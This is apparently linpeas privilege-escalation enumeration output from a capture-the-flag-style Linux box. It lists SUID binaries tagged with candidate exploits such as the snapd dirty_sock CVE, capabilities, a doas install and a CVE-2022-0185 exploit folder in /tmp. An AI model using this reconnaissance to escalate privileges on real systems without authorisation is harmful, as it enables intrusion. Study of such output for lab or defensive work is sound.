Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow                                                                                                                                                                


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Dec  1 18:14 /etc/pam.d                                                                                                                             
-rw-r--r-- 1 root root 2133 Mar 30  2022 /etc/pam.d/sshd




╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions                                                                                          
tmux 3.0a                                                                                                                                                                       


/tmp/tmux-1001
╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3787 Oct  3 16:57 /snap/core20/1695/etc/cloud/cloud.cfg                                                                                                  
     lock_passwd: True

╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 200 Oct 27 15:47 /snap/core20/1695/usr/share/keyrings                                                                                                    
drwxr-xr-x 2 root root 4096 Dec  1 18:12 /usr/share/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                                                                                                                                                  
passwd file: /etc/passwd
passwd file: /snap/core20/1695/etc/pam.d/passwd
passwd file: /snap/core20/1695/etc/passwd
passwd file: /snap/core20/1695/usr/share/bash-completion/completions/passwd
passwd file: /snap/core20/1695/usr/share/lintian/overrides/passwd
passwd file: /snap/core20/1695/var/lib/extrausers/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/node_modules/npm/node_modules/node-gyp/.github                                                                                
drwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/node_modules/npm/node_modules/node-gyp/gyp/.github
drwxr-xr-x 3 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/ast-types/.github
drwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/balanced-match/.github
drwxr-xr-x 3 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/proxy-agent/.github
drwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.github
drwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.github



drwxr-xr-x 8 www-data www-data 4096 Mar 18 11:42 /tmp/CVE-2022-0185/.git

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg                                                                                                                                                                    
netpgpkeys Not Found
netpgp Not Found                                                                                                                                                                
                                                                                                                                                                                
-rw-r--r-- 1 root root 2796 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw------- 1 player player 1200 Mar 19 03:58 /home/player/.gnupg/trustdb.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core20/1695/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core20/1695/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core20/1695/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core20/1695/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core20/1695/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 3267 Jul  4  2022 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2206 Nov 17 08:06 /usr/share/keyrings/nodesource.gpg
-rw-r--r-- 1 root root 2247 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 2250 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-ros.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13  2020 /usr/share/popularity-contest/debian-popcon.gpg

drwx------ 3 player player 4096 Mar 19 07:08 /home/player/.gnupg

╔══════════╣ Analyzing Cache Vi Files (limit 70)
                                                                                                                                                                                
lrwxrwxrwx 1 root root 9 Nov 17 09:02 /home/player/.viminfo -> /dev/null

╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation                                                         
-rw-r--r-- 1 root root 477 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/docker-compose.yml                                                                       


╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 813 Feb  2  2020 /snap/core20/1695/usr/share/bash-completion/completions/postfix                                                                         

-rw-r--r-- 1 root root 813 Feb  2  2020 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing FTP Files (limit 70)
                                                                                                                                                                                

-rw-r--r-- 1 root root 69 Nov  2 09:53 /etc/php/7.4/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Nov  2 09:53 /usr/share/php7.4-common/common/ftp.ini






╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind                                                                                             
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind



╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 www-data adm 8751 Mar 19 07:01 /var/log/nginx/access.log                                                                                                           

-rw-r----- 1 www-data adm 0 Mar 19 00:00 /var/log/nginx/error.log

╔══════════╣ Analyzing Windows Files (limit 70)
                                                                                                                                                                                





















lrwxrwxrwx 1 root root 20 Nov 17 08:10 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf
lrwxrwxrwx 1 root root 24 Nov 17 08:09 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 81 Dec  1 18:13 /var/lib/dpkg/alternatives/my.cnf



























╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc                                                                                                                      
-rw-r--r-- 1 player player 3771 Feb 25  2020 /home/player/.bashrc
-rw-r--r-- 1 root root 3771 Feb 25  2020 /snap/core20/1695/etc/skel/.bashrc



-rw------- 1 player player 36 Mar 19 05:23 /home/player/.lesshst


-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile
-rw-r--r-- 1 player player 807 Feb 25  2020 /home/player/.profile
-rw-r--r-- 1 root root 807 Feb 25  2020 /snap/core20/1695/etc/skel/.profile






                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════                                                                                             
                               ╚═══════════════════╝                                                                                                                            
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                
-rwsr-xr-x 1 root root 42K Nov 17 09:09 /usr/local/bin/doas                                                                                                                     
-rwsr-xr-x 1 root root 140K Nov 28 04:55 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-- 1 root messagebus 51K Oct 25 13:09 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Mar 30  2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 39K Feb  7  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 55K Feb  7  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 67K Feb  7  2022 /usr/bin/su
-rwsr-xr-x 1 root root 44K Nov 29 11:53 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 84K Nov 29 11:53 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 67K Nov 29 11:53 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 87K Nov 29 11:53 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 52K Nov 29 11:53 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 121K Nov 25 17:29 /snap/snapd/17883/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 84K Mar 14  2022 /snap/core20/1695/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Mar 14  2022 /snap/core20/1695/usr/bin/chsh
-rwsr-xr-x 1 root root 87K Mar 14  2022 /snap/core20/1695/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Feb  7  2022 /snap/core20/1695/usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Mar 14  2022 /snap/core20/1695/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 67K Mar 14  2022 /snap/core20/1695/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Feb  7  2022 /snap/core20/1695/usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19  2021 /snap/core20/1695/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 39K Feb  7  2022 /snap/core20/1695/usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-- 1 root systemd-resolve 51K Oct 25 13:09 /snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Mar 30  2022 /snap/core20/1695/usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter                                                                                             
-rwxr-sr-x 1 root shadow 31K Nov 29 11:53 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 343K Mar 30  2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 83K Nov 29 11:53 /usr/bin/chage
-rwxr-sr-x 1 root tty 35K Feb  7  2022 /usr/bin/wall
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root shadow 43K Sep 17  2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17  2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 83K Mar 14  2022 /snap/core20/1695/usr/bin/chage
-rwxr-sr-x 1 root shadow 31K Mar 14  2022 /snap/core20/1695/usr/bin/expiry
-rwxr-sr-x 1 root crontab 343K Mar 30  2022 /snap/core20/1695/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Feb  7  2022 /snap/core20/1695/usr/bin/wall
-rwxr-sr-x 1 root shadow 43K Sep 17  2021 /snap/core20/1695/usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17  2021 /snap/core20/1695/usr/sbin/unix_chkpwd

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so                                                                                                        
/etc/ld.so.conf                                                                                                                                                                 
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
/usr/lib/x86_64-linux-gnu/libfakeroot
  /etc/ld.so.conf.d/libc.conf
/usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                                 
Current env capabilities:                                                                                                                                                       
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

Parent Shell capabilities:
0x0000000000000000=

Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/snap/core20/1695/usr/bin/ping = cap_net_raw+ep

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                                 
                                                                                                                                                                                
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3461 Jun 21  2022 sbin.dhclient                                                                                                                         
-rw-r--r-- 1 root root  3202 Feb 25  2020 usr.bin.man
-rw-r--r-- 1 root root 28486 Nov 28 04:55 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root  2006 Oct 19 11:35 usr.sbin.mysqld
-rw-r--r-- 1 root root  1575 Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root  1385 Dec  7  2019 usr.sbin.tcpdump

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls                                                                                                         
files with acls in searched folders Not Found                                                                                                                                   
                                                                                                                                                                                
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                                                      
/usr/bin/rescan-scsi-bus.sh                                                                                                                                                     
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2022-11-17+09:09:15.5479107120 /usr/local/bin/doasedit                                                                                                                          
2022-11-17+09:09:15.5439087120 /usr/local/bin/vidoas
2022-11-17+09:09:15.5399067120 /usr/local/bin/doas
2022-11-15+21:42:19.3514476930 /etc/grub.d/01_track_initrdless_boot_fallback
2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_terminal.sh
2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_keyboard.sh
2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_font.sh

╔══════════╣ Unexpected in root
/data                                                                                                                                                                           
/vagrant

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files                                                                                               
total 36                                                                                                                                                                        
drwxr-xr-x   2 root root 4096 Dec  1 18:14 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r--   1 root root   96 Dec  5  2019 01-locale-fix.sh
-rw-r--r--   1 root root 1557 Feb 17  2020 Z97-byobu.sh
-rw-r--r--   1 root root  835 Oct 17 16:25 apps-bin-path.sh
-rw-r--r--   1 root root  729 Feb  2  2020 bash_completion.sh
-rw-r--r--   1 root root 1003 Aug 13  2019 cedilla-portuguese.sh
-rw-r--r--   1 root root 1107 Nov  3  2019 gawk.csh
-rw-r--r--   1 root root  757 Nov  3  2019 gawk.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d                                                                                 
                                                                                                                                                                                
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No                                                                                                                                    
═╣ Credentials in fstab/mtab? ........... No                                                                                                                                    
═╣ Can I read shadow files? ............. No                                                                                                                                    
═╣ Can I read shadow plists? ............ No                                                                                                                                    
═╣ Can I write shadow plists? ........... No                                                                                                                                    
═╣ Can I read opasswd file? ............. No                                                                                                                                    
═╣ Can I write in network-scripts? ...... No                                                                                                                                    
═╣ Can I read root folder? .............. No                                                                                                                                    
                                                                                                                                                                                
╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                                                                                                                          
/home/player/.viminfo
/home/player/user.txt
/home/player/.bash_history
/root/
/var/www
/var/www/html
/var/www/html/ground1.jpg
/var/www/html/ground4.jpg
/var/www/html/football.jpg
/var/www/html/ground3.jpg
/var/www/html/index.html
/var/www/html/tiny
/var/www/html/tiny/tinyfilemanager.php
/var/www/html/tiny/uploads
/var/www/html/ground2.jpg

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/player                                                                                                                                                                    
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/[email protected]
/sys/fs/cgroup/unified/user.slice/user-1001.slice/[email protected]

╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root player 33 Mar 18 11:05 /home/player/user.txt                                                                                                                  

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log                                                                                                                                                               
/var/log/syslog
/var/log/journal/54adfd95645d49d9a102f16e9e98293b/system.journal
/var/log/journal/54adfd95645d49d9a102f16e9e98293b/user-1001.journal

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation                                                                                       
logrotate 3.14.0                                                                                                                                                                

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

╔══════════╣ Files inside /home/player (limit 20)
total 860                                                                                                                                                                       
drwxr-xr-x 7 player player   4096 Mar 19 07:07 .
drwxr-xr-x 3 root   root     4096 Nov 17 09:25 ..
lrwxrwxrwx 1 root   root        9 Nov 17 09:02 .bash_history -> /dev/null
-rw-r--r-- 1 player player    220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 player player   3771 Feb 25  2020 .bashrc
drwx------ 2 player player   4096 Nov 17 09:00 .cache
drwx------ 3 player player   4096 Mar 19 04:05 .config
drwx------ 3 player player   4096 Mar 19 07:08 .gnupg
-rw------- 1 player player     36 Mar 19 05:23 .lesshst
drwxrwxr-x 3 player player   4096 Mar 18 18:53 .local
-rw-r--r-- 1 player player    807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root        9 Nov 17 09:02 .viminfo -> /dev/null
-rwxrwxr-x 1 player player 828172 Feb 26 04:31 linpeas.sh
drwx------ 3 player player   4096 Mar 19 03:52 snap
-rw-r----- 1 root   player     33 Mar 18 11:05 user.txt

╔══════════╣ Files inside others home (limit 20)
/var/www/html/ground1.jpg                                                                                                                                                       
/var/www/html/ground4.jpg
/var/www/html/football.jpg
/var/www/html/ground3.jpg
/var/www/html/index.html
/var/www/html/tiny/tinyfilemanager.php
/var/www/html/ground2.jpg

╔══════════╣ Searching installed mail applications
                                                                                                                                                                                
╔══════════╣ Mails (limit 50)
                                                                                                                                                                                
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz                                                                                                    
-rw-r--r-- 1 root root 392817 Feb  9  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 11886 Nov 17 09:07 /usr/share/info/dir.old
-rw-r--r-- 1 root root 2756 Feb 13  2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 44048 Aug 16  2022 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 1802 Aug 15  2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1413 Nov 15 21:40 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 39448 Nov 15 20:42 /usr/lib/mysql/plugin/component_mysqlbackup.so
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-135/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 237863 Nov 23 19:51 /usr/src/linux-headers-5.4.0-135-generic/.config.old
-rw-r--r-- 1 root root 0 Nov 23 19:51 /usr/src/linux-headers-5.4.0-135-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Nov 23 19:51 /usr/src/linux-headers-5.4.0-135-generic/include/config/wm831x/backup.h

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001                                                                       
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
 -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)                                                                                                    
 -> Extracting tables from /var/lib/fwupd/pending.db (limit 20)                                                                                                                 
                                                                                                                                                                                
╔══════════╣ Web files?(output limit)
/var/www/:                                                                                                                                                                      
total 12K
drwxr-xr-x  3 root root 4.0K Nov 17 08:06 .
drwxr-xr-x 14 root root 4.0K Nov 17 08:06 ..
drwxr-xr-x  3 root root 4.0K Nov 17 08:20 html

/var/www/html:
total 1.1M
drwxr-xr-x 3 root root 4.0K Nov 17 08:20 .
drwxr-xr-x 3 root root 4.0K Nov 17 08:06 ..

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw------- 1 root root 0 Mar 18 11:05 /run/snapd/lock/.lock                                                                                                                     
-rw-r--r-- 1 root root 0 Mar 18 11:05 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 121 Nov  3 11:37 /usr/lib/node_modules/npm/node_modules/node-gyp/gyp/.flake8
-rw-r--r-- 1 root root 38 Oct 14  2021 /usr/lib/node_modules/npm/node_modules/qrcode-terminal/.travis.yml
-rw-r--r-- 1 root root 0 Oct 14  2021 /usr/lib/node_modules/npm/.npmrc
-rw-r--r-- 1 root root 119 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/continuation-local-storage/.travis.yml
-rw-r--r-- 1 root root 422 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/continuation-local-storage/.eslintrc
-rw-r--r-- 1 root root 78 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/dayjs/.editorconfig
-rw-r--r-- 1 root root 605 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.editorconfig
-rw-r--r-- 1 root root 1687 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.eslintrc
-rw-r--r-- 1 root root 52 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/deep-is/.travis.yml
-rw-r--r-- 1 root root 71 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/shimmer/.travis.yml
-rw-r--r-- 1 root root 71 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/emitter-listener/.travis.yml
-rw-r--r-- 1 root root 63 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/pm2-axon-rpc/.travis.yml
-rw-r--r-- 1 root root 144 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/yamljs/.travis.yml
-rw-r--r-- 1 root root 207 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/socks/.eslintrc.cjs
-rw-r--r-- 1 root root 124 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/socks/.prettierrc.yaml
-rw-r--r-- 1 root root 230 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/fclone/.travis.yml
-rw-r--r-- 1 root root 139 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/is-core-module/.nycrc
-rw-r--r-- 1 root root 339 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/is-core-module/.eslintrc
-rw-r--r-- 1 root root 107 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vizion/.travis.yml
-rw-r--r-- 1 root root 63 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/module-details-from-path/.travis.yml
-rw-r--r-- 1 root root 33 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vm2/.eslintignore
-rw-r--r-- 1 root root 213 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vm2/.eslintrc.js
-rw-r--r-- 1 root root 242 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/estraverse/.jshintrc
-rw-r--r-- 1 root root 152 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/smart-buffer/.travis.yml
-rw-r--r-- 1 root root 84 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/smart-buffer/.prettierrc.yaml
-rw-r--r-- 1 root root 1168 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.jshintrc
-rw-r--r-- 1 root root 220 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.editorconfig
-rw-r--r-- 1 root root 62 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.travis.yml
-rw-r--r-- 1 root root 2343 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/.drone.jsonnet
-rw-r--r-- 1 root root 280 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/.mocharc.js
-rw-r--r-- 1 root root 2095 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/js-api/.drone.jsonnet
-rw-r--r-- 1 root root 78 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/node_modules/dayjs/.editorconfig
-rw-r--r-- 1 root root 2745 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/.drone.jsonnet
-rw-r--r-- 1 root root 244 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/.mocharc.yml
-rw-r--r-- 1 root root 219 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/async-listener/.travis.yml
-rw-r--r-- 1 root root 139 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.nycrc
-rw-r--r-- 1 root root 132 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.eslintrc
-rw-r--r-- 1 root root 43 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/concat-map/.travis.yml
-rw-r--r-- 1 root root 50 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/log-driver/.travis.yml
-rw-r--r-- 1 root root 125 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/tx2/.travis.yml
-rw-r--r-- 1 root root 286 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.editorconfig
-rw-r--r-- 1 root root 4140 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.jscs.json
-rw-r--r-- 1 root root 5451 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.travis.yml
-rw-r--r-- 1 root root 176 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/test/.eslintrc
-rw-r--r-- 1 root root 231 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.eslintrc
